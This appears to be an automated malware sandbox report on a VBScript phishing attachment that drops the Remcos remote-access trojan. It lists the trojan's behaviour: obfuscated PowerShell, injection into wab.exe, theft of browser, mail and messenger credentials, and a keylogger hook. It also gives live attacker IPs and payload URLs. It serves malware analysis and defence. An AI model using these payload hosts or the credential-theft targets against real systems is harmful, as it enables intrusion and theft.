Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_240C2264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 13_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0041739B GetVersionExW, 11_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 13_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 13_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 13_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: wab.exe PID: 5652, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I Jump to behavior
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467964 Sample: PAYMENT - STATEMENT ADVISE.vbs Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 42 geoplugin.net 2->42 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 13 other signatures 2->60 10 wscript.exe 1 2->10         started        signatures3 process4 signatures5 62 VBScript performs obfuscated calls to suspicious functions 10->62 64 Suspicious powershell command line found 10->64 66 Wscript starts Powershell (via cmd or directly) 10->66 68 3 other signatures 10->68 13 powershell.exe 14 19 10->13         started        process6 dnsIp7 48 103.237.86.247, 49705, 64544, 80 BGNR-AP2BainandCompanySG unknown 13->48 76 Suspicious powershell command line found 13->76 78 Obfuscated command line found 13->78 80 Very long command line found 13->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 13->82 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 17->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 17->52 24 wab.exe 3 15 17->24         started        29 cmd.exe 1 17->29         started        process11 dnsIp12 44 103.237.87.32, 1999, 64545, 64546 BGNR-AP2BainandCompanySG unknown 24->44 46 geoplugin.net 178.237.33.50, 64547, 80 ATOM86-ASATOM86NL Netherlands 24->46 40 C:\ProgramData\remcos\logs.dat, data 24->40 dropped 70 Detected Remcos RAT 24->70 72 Maps a DLL or memory area into another process 24->72 74 Installs a global keyboard hook 24->74 31 wab.exe 1 24->31         started        34 wab.exe 1 24->34         started        36 wab.exe 2 24->36         started        38 wab.exe 24->38         started        file13 signatures14 process15 signatures16 84 Tries to steal Instant Messenger accounts or passwords 31->84 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 34->88
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false
103.237.86.247
 unknown unknown
133587 BGNR-AP2BainandCompanySG false
103.237.87.32
 unknown unknown
133587 BGNR-AP2BainandCompanySG true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
geoplugin.net 178.237.33.50 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://103.237.86.247/mtyozjDM72.bin false
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
103.237.87.32 true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://geoplugin.net/json.gp false
  • URL Reputation: safe
 unknown
http://103.237.86.247/acidizes.mso false
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown